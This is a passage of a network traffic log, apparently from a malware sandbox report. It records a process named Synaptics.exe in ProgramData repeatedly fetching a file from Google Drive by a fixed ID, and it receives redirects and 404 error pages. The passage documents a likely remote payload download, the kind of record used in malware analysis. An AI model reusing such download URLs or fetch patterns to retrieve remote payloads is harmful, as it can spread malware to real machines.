                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              48192.168.2.749894216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:00 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=O3h5K0Mlym-rrLjhzGpk4j7uTinDx0L_6UzibdP1RDC_dxub7vgJKYEHbgEy2EUzTv6j_Scn4-yJmKWdQ7GPwv8A4sHSmxpOkYMPAnFnYaMPENGOIsuDmm1Y5WSmNZAxu3tfYoY7sv5Qty8H7UJa53mIoIRZkFIVFgAxzxyrueB1f-dHIGAb-TA
                                                                                              2025-01-02 19:29:01 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:01 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-mBbD3Qvw7P8tomU_Fh4dPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              49192.168.2.749895142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:00 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:01 UTC1243INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC6Sj2xJNtXm2JWAqdfXLkWjKsEwoQEvlgIIoMOWJznSd2J2OY2paMd-VA6Xd8BaSfs9
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:01 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-GrLzfUWsrSgGewT7aUB55A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:01 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                              2025-01-02 19:29:01 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 57 49 37 68 6e 64 61 69 65 47 4b 66 57 56 46 4d 4b 32 73 6d 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                              Data Ascii: t Found)!!1</title><style nonce="VWI7hndaieGKfWVFMK2smg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                              2025-01-02 19:29:01 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              50192.168.2.749905216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:01 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=O3h5K0Mlym-rrLjhzGpk4j7uTinDx0L_6UzibdP1RDC_dxub7vgJKYEHbgEy2EUzTv6j_Scn4-yJmKWdQ7GPwv8A4sHSmxpOkYMPAnFnYaMPENGOIsuDmm1Y5WSmNZAxu3tfYoY7sv5Qty8H7UJa53mIoIRZkFIVFgAxzxyrueB1f-dHIGAb-TA


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              51192.168.2.749907216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:01 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=GeAkmjbx9XzFNs4FFTRBp3iyJ_rRSIBOK5y196FKDF35PMipuw2aVwOKuIboxDPPASQuN-xbYZJkPpmtKazWJJ6TnCTLy4vwt9MEVuXzyph2RWF4j13r0KkdCxjiMzCLuTYbg-ZCUTdHoPAJjpCEwZFbPE4TT1r8RUGqNdikHEOX1FTNOdkVh2I


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              52192.168.2.749906142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:01 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              53192.168.2.749915216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:02 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=GeAkmjbx9XzFNs4FFTRBp3iyJ_rRSIBOK5y196FKDF35PMipuw2aVwOKuIboxDPPASQuN-xbYZJkPpmtKazWJJ6TnCTLy4vwt9MEVuXzyph2RWF4j13r0KkdCxjiMzCLuTYbg-ZCUTdHoPAJjpCEwZFbPE4TT1r8RUGqNdikHEOX1FTNOdkVh2I
                                                                                              2025-01-02 19:29:03 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:02 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-LDITmQrxCL8Zo1intcFHTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              54192.168.2.749916216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:02 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=GeAkmjbx9XzFNs4FFTRBp3iyJ_rRSIBOK5y196FKDF35PMipuw2aVwOKuIboxDPPASQuN-xbYZJkPpmtKazWJJ6TnCTLy4vwt9MEVuXzyph2RWF4j13r0KkdCxjiMzCLuTYbg-ZCUTdHoPAJjpCEwZFbPE4TT1r8RUGqNdikHEOX1FTNOdkVh2I
                                                                                              2025-01-02 19:29:03 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:02 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-jV8iFSeO5phAmvw9PgF95w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              55192.168.2.749927216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:03 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:04 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:04 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-Wz6d7zF5I6_OgllPfcyZMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              56192.168.2.749926142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:03 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:04 UTC1250INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC51A9Q-IEt5H_A7BmmAGcISxAnkDn459a35Bc0KN64_31Cdo3zAx5IfgT80JBefK1AYd3Z7_Pg
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:04 GMT
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-aTKSeuoI7bcHS9TxX_8rBQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:04 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                              2025-01-02 19:29:04 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 67 39 4c 6b 4a 35 6a 70 5f 42 74 36 6e 5a 32 51 79 72 54 6d 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="Gg9LkJ5jp_Bt6nZ2QyrTmg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                              2025-01-02 19:29:04 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              57192.168.2.749929142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:03 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:04 UTC1243INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC6619NRU2svW49RRG81jeGP7dvMM36VFMLATIiLpWDasnPfntLm7NIOHmjUxoKw7NmX
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:04 GMT
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-kNmg2oDJKNSLSj8-btJovw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:04 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                              2025-01-02 19:29:04 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 6c 30 33 72 2d 74 71 30 79 44 33 44 2d 6f 51 69 55 4a 6d 4c 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                              Data Ascii: t Found)!!1</title><style nonce="Ml03r-tq0yD3D-oQiUJmLQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
